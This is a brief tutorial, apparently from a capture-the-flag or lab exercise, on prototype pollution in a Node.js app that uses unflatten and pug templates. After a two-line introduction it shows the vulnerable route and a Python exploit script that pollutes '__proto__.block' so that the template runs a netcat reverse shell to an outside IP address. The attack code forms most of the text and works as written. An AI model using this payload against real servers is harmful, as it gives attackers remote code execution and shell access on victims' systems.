Introduction
Prototype Pollution is a vulnerability that allows an attacker to modify the prototype of an object. This can be exploited to gain remote code execution on a server.
Try it yourself
Based on the following vulnerability:
const pug = require('pug');
...
router.post('/api/submit', (req, res) => {
const { artist } = unflatten(req.body);
if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
return res.json({
'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
});
} else {
return res.json({
'response': 'Please provide us with the full name of an existing member.'
});
}
});exploit code:
import requests
TARGET_URL = 'http://127.0.0.1:1337'
# make pollution
r = requests.post(TARGET_URL + '/api/submit', json = {
"artist.name":"Haigh", #This is the value that is being set to the artist.name
"__proto__.block": {
"type": "Text",
"line": "process.mainModule.require('child_process').execSync(`sh -c 'nc 172.20.10.4 9001 -e sh'`)"
}
})